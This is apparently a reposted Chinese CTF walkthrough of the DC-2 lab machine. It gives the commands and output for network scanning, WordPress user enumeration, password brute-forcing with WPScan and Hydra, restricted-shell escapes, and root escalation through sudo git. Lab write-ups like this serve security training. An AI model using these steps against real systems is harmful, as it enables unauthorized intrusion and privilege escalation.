【DC渗透系列DC-2】

劲松待人生

arp先扫

1. ┌──(root㉿kali)-[~]
2. └─# arp-scan -l
3. Interface: eth0, type: EN10MB, MAC: 00:0c:29:6b:ed:27, IPv4: 192.168.100.251
4. Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
5. 192.168.100.1   00:50:56:c0:00:08       VMware, Inc.
6. 192.168.100.2   00:50:56:fc:f2:a6       VMware, Inc.
7. 192.168.100.23  00:0c:29:64:16:07       VMware, Inc.
8. 192.168.100.254 00:50:56:ef:65:1b       VMware, Inc.
10. 4 packets received by filter, 0 packets dropped by kernel
11. Ending arp-scan 1.10.0: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 4 responded

复制代码

nmap扫

1. ┌──(root㉿kali)-[~]
2. └─# nmap -sS -sV -A -n -p- 192.168.100.23
3. Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-01 19:32 EST
4. Nmap scan report for 192.168.100.23
5. Host is up (0.0014s latency).
6. Not shown: 65533 closed tcp ports (reset)
7. PORT     STATE SERVICE VERSION
8. 80/tcp   open  http    Apache httpd 2.4.10 ((Debian))
9. |_http-title: Did not follow redirect to http://dc-2/
10. |_http-server-header: Apache/2.4.10 (Debian)
11. 7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
12. | ssh-hostkey:
13. |   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
14. |   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
15. |   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
16. |_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
17. MAC Address: 00:0C:29:64:16:07 (VMware)
18. Device type: general purpose
19. Running: Linux 3.X|4.X
20. OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
21. OS details: Linux 3.2 - 4.9
22. Network Distance: 1 hop
23. Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
25. TRACEROUTE
26. HOP RTT     ADDRESS
27. 1   1.37 ms 192.168.100.23
29. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
30. Nmap done: 1 IP address (1 host up) scanned in 12.52 seconds

复制代码

开了80的http端口和7744的ssh的端口
尝试浏览器访问

1. Hmm. We’re having trouble finding that site.
3. We can’t connect to the server at dc-2.
5. If that address is correct, here are three other things you can try:
7.     Try again later.
8.     Check your network connection.
9.     If you are connected but behind a firewall, check that Firefox has permission to access the Web.

复制代码

url跳到http://dc-2/
修改hosts文件

/etc/hosts（linux系统）
C:\Windows\System32\drivers\etc\hosts（Windows系统）

就好啦

找到flag1

发现是一个wordpress搭建的网站

flag中提示说要登录，找不到flag2就换个号登
dirsearch扫一下登陆界面

找到http://dc-2/wp-admin/

访问成功
开始爆破
kali密码攻击工具——Cewl使用指南

1. ┌──(root㉿kali)-[~/Desktop]
2. └─# cewl http://dc-2/ -w /root/Desktop/dict.txt
3. CeWL 5.5.2 (Grouping) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

复制代码

专门针对WordPress的工具WPScan

1. ┌──(root㉿kali)-[~/Desktop]
2. └─# wpscan --url dc-2 -e u
3. _______________________________________________________________
4.          __          _______   _____
5.          \ \        / /  __ \ / ____|
6.           \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
7.            \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
8.             \  /\  /  | |     ____) | (__| (_| | | | |
9.              \/  \/   |_|    |_____/ \___|\__,_|_| |_|
11.          WordPress Security Scanner by the WPScan Team
12.                          Version 3.8.24
13.                               
14.        @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
15. _______________________________________________________________
17. [i] Updating the Database ...
18. [i] Update completed.
20. [+] URL: http://dc-2/ [192.168.100.23]
21. [+] Started: Thu Feb  1 20:12:07 2024
23. Interesting Finding(s):
25. [+] Headers
26. | Interesting Entry: Server: Apache/2.4.10 (Debian)
27. | Found By: Headers (Passive Detection)
28. | Confidence: 100%
30. [+] XML-RPC seems to be enabled: http://dc-2/xmlrpc.php
31. | Found By: Direct Access (Aggressive Detection)
32. | Confidence: 100%
33. | References:
34. |  - http://codex.wordpress.org/XML-RPC_Pingback_API
35. |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
36. |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
37. |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
38. |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
40. [+] WordPress readme found: http://dc-2/readme.html
41. | Found By: Direct Access (Aggressive Detection)
42. | Confidence: 100%
44. [+] The external WP-Cron seems to be enabled: http://dc-2/wp-cron.php
45. | Found By: Direct Access (Aggressive Detection)
46. | Confidence: 60%
47. | References:
48. |  - https://www.iplocation.net/defend-wordpress-from-ddos
49. |  - https://github.com/wpscanteam/wpscan/issues/1299
51. [+] WordPress version 4.7.10 identified (Insecure, released on 2018-04-03).
52. | Found By: Rss Generator (Passive Detection)
53. |  - http://dc-2/index.php/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
54. |  - http://dc-2/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.7.10</generator>
56. [+] WordPress theme in use: twentyseventeen
57. | Location: http://dc-2/wp-content/themes/twentyseventeen/
58. | Last Updated: 2024-01-16T00:00:00.000Z
59. | Readme: http://dc-2/wp-content/themes/twentyseventeen/README.txt
60. | [!] The version is out of date, the latest version is 3.5
61. | Style URL: http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10
62. | Style Name: Twenty Seventeen
63. | Style URI: https://wordpress.org/themes/twentyseventeen/
64. | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
65. | Author: the WordPress team
66. | Author URI: https://wordpress.org/
67. |
68. | Found By: Css Style In Homepage (Passive Detection)
69. |
70. | Version: 1.2 (80% confidence)
71. | Found By: Style (Passive Detection)
72. |  - http://dc-2/wp-content/themes/twentyseventeen/style.css?ver=4.7.10, Match: 'Version: 1.2'
74. [+] Enumerating Users (via Passive and Aggressive Methods)
75. Brute Forcing Author IDs - Time: 00:00:00 <===================================================================> (10 / 10) 100.00% Time: 00:00:00
77. [i] User(s) Identified:
79. [+] admin
80. | Found By: Rss Generator (Passive Detection)
81. | Confirmed By:
82. |  Wp Json Api (Aggressive Detection)
83. |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
84. |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
85. |  Login Error Messages (Aggressive Detection)
87. [+] jerry
88. | Found By: Wp Json Api (Aggressive Detection)
89. |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
90. | Confirmed By:
91. |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
92. |  Login Error Messages (Aggressive Detection)
94. [+] tom
95. | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
96. | Confirmed By: Login Error Messages (Aggressive Detection)
98. [!] No WPScan API Token given, as a result vulnerability data has not been output.
99. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
101. [+] Finished: Thu Feb  1 20:12:10 2024
102. [+] Requests Done: 74
103. [+] Cached Requests: 6
104. [+] Data Sent: 16.619 KB
105. [+] Data Received: 21.289 MB
106. [+] Memory used: 177.188 MB
107. [+] Elapsed time: 00:00:03

复制代码

扫出三个用户名，放入user.txt

1. ┌──(root㉿kali)-[~/Desktop]
2. └─# vim user.txt  
3.                                                                                                                                                 
4. ┌──(root㉿kali)-[~/Desktop]
5. └─# cat user.txt                              
6. admin
7. jerry
8. tom

复制代码

开始爆破

1. ┌──(root㉿kali)-[~/Desktop]
2. └─# wpscan --url dc-2 -U '/root/Desktop/user.txt'  -P '/root/Desktop/dict.txt'

复制代码

1. [!] Valid Combinations Found:
2. | Username: jerry, Password: adipiscing
3. | Username: tom, Password: parturient

复制代码

jerry登录page里面找到flag2

提示我们；另一条路，账号名密码都有，想到前面的7744ssh端口爆破
同DC-9解法，海德拉

1. ┌──(root㉿kali)-[~/Desktop]
2. └─# hydra -L user.txt -P dict.txt ssh://192.168.100.23:7744
3. Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
5. Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-02-01 20:30:05
6. [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
7. [DATA] max 16 tasks per 1 server, overall 16 tasks, 714 login tries (l:3/p:238), ~45 tries per task
8. [DATA] attacking ssh://192.168.100.23:7744/
9. [STATUS] 146.00 tries/min, 146 tries in 00:01h, 571 to do in 00:04h, 13 active
10. [STATUS] 105.67 tries/min, 317 tries in 00:03h, 400 to do in 00:04h, 13 active
11. [7744][ssh] host: 192.168.100.23   login: tom   password: parturient
12. 1 of 1 target successfully completed, 1 valid password found
13. [WARNING] Writing restore file because 2 final worker threads did not complete until end.
14. [ERROR] 2 targets did not resolve or could not be connected
15. [ERROR] 0 target did not complete
16. Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-02-01 20:36:40

复制代码

ssh尝试连接

ssh登录
使用less和vi可以查看

1. ┌──(root㉿kali)-[~]
2. └─# ssh tom@192.168.100.23 -p 7744
3. The authenticity of host '[192.168.100.23]:7744 ([192.168.100.23]:7744)' can't be established.
4. ED25519 key fingerprint is SHA256:JEugxeXYqsY0dfaV/hdSQN31Pp0vLi5iGFvQb8cB1YA.
5. This key is not known by any other names.
6. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
7. Warning: Permanently added '[192.168.100.23]:7744' (ED25519) to the list of known hosts.
8. tom@192.168.100.23's password:
10. The programs included with the Debian GNU/Linux system are free software;
11. the exact distribution terms for each program are described in the
12. individual files in /usr/share/doc/*/copyright.
14. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
15. permitted by applicable law.
16. tom@DC-2:~$ ls
17. flag3.txt  usr
18. tom@DC-2:~$ cat flag3.txt
19. -rbash: cat: command not found
20. tom@DC-2:~$ more flag3.txt
21. -rbash: more: command not found
22. tom@DC-2:~$
23. tom@DC-2:~$ less flag3.txt

复制代码

受限制shell（rbash-->相当于你的权限很低，很多命令用不了）的原因，命令type,cat,more,vim都无法查看
绕过rbash

法一：使用vi编辑进行绕过
（1）vi 文件名   //文件名自取
（2）输入:set shell=/bin/sh,然后回车
（3）输入:shell
（4）设置环境变量：export PATH=/usr/sbin:/usr/bin:/sbin:/bin
法二：BASH_CMDS设置shell

1. BASH_CMDS[x]=/bin/bash   #设置了个x变量shell
2. x    #相当于执行shell
3. export PATH=$PATH:/bin/
4. export PATH=$PATH:/usr/bin/

复制代码

应该与jerrry有关，转到jerry目录，发现flag4

1. tom@DC-2:~$ ls
2. 123  denglu  flag3.txt  tom  usr
3. tom@DC-2:~$ pwd
4. /home/tom
5. tom@DC-2:~$ cd ..
6. tom@DC-2:/home$ ls
7. jerry  tom
8. tom@DC-2:/home$ cd jerry
9. tom@DC-2:/home/jerry$ ls
10. flag4.txt
11. tom@DC-2:/home/jerry$

复制代码

还是提示git提权了
git提权

先转到jerry，密码前面找过了

法一：

1. sudo -l  //查询可用sudo命令

复制代码

果然有git

1. tom@DC-2:/home/jerry$ su jerry
2. Password:
3. jerry@DC-2:~$
4. jerry@DC-2:~$ sudo -l
5. Matching Defaults entries for jerry on DC-2:
6.     env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
8. User jerry may run the following commands on DC-2:
9.     (root) NOPASSWD: /usr/bin/git
10. jerry@DC-2:~$

复制代码

1. sudo git help config //强制进入交互状态

复制代码

1. !/bin/bash  (这里bash也可以换成sh) //打开一个root权限下的shell

复制代码

1. jerry@DC-2:~$ sudo git help config //强制进入交互状态
2. root@DC-2:/home/jerry#

复制代码

法二：

1. sudo git -p help

复制代码

1. !/bin/bash  (这里bash也可以换成sh)

复制代码

flag在root目录下

结束！

来源:https://www.cnblogs.com/p1ggy/p/18002664
免责声明：由于采集信息均来自互联网，如果侵犯了您的权益，请联系我们【E-Mail:cb@itdo.tech】 我们会及时删除侵权内容，谢谢合作！